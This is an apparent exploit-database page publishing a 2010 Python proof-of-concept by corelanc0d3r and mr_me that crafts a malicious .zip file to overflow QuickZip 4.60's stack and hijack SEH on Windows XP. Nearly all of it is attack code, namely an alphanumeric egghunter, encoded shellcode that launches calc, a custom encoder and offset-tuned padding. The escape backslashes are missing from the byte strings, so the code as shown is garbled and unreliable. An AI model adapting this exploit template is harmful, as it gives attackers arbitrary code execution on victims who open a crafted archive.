QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit
# Published : 2010-03-08
# Author : corelanc0d3r and mr_me
# Previous Title : Lenovo Hotkey Driver <= v5.33 Privilege Escalation
# Next Title : Yahoo Player v1.0 (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)
#!/usr/bin/python
#
# ###############################################################################
# Exploit Title : QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit
# Date          : 9/3/2010
# Author        : corelanc0d3r & mr_me
# Bug found by  : corelanc0d3r (http://corelan.be:8800/)
# Software Link : http://www.quickzip.org/downloads.html
# Version       : 4.60
# OS            : Windows
# Tested on     : XP SP3 En
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ###############################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# how does this work?
# http://www.offensive-security.com/blog/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit"

header_1 = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00xe4x0fx00x00x00")

header_2 = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")

header_3 = ("x50x4Bx05x06x00x00x00x00x01x00x01x00"
"x12x10x00x00x02x10x00x00x00x00")

# pure ascii egghunter, thanks to skylined
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");

calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
"x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
"x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
"x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
"x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
"x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
"x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
"x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
"x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
"x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
"x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
"x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
"x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
"x50x41x41");

# custom encoder
encoder = ("x25x4Ax4Dx4Ex55"   
"x25x35x32x31x2A"			
"x2dx55x55x55x5f"			
"x2dx56x55x56x5f"			
"x2dx55x55x55x5e"			
"x50" 							
"x25x4Ax4Dx4Ex55"   
"x25x35x32x31x2A" 			
"x2dx2bx6ax32x53"			
"x2dx2ax6ax31x54"			
"x2dx2ax69x31x54"			
"x50"							
);

print "[+] Building PoC.."

lol = "x43" * 20
lol += egghunter 
lol += "x41" * (223-len(lol))
lol += "x61"
lol += "x53"
lol += "x5c"
lol += encoder
lol += "x41" * (294-len(lol))
lol += "x73xf9x41x41"
lol += "x5cx53x46x00"
lol += "W00TW00T"
lol += calc
lol += "x42" * (4064-len(lol))
lol += ".txt"

exploit = header_1 + lol + header_2 + lol + header_3

mefile = open('cst.zip','w');
mefile.write(exploit);
mefile.close()
print "[+] Exploit complete!"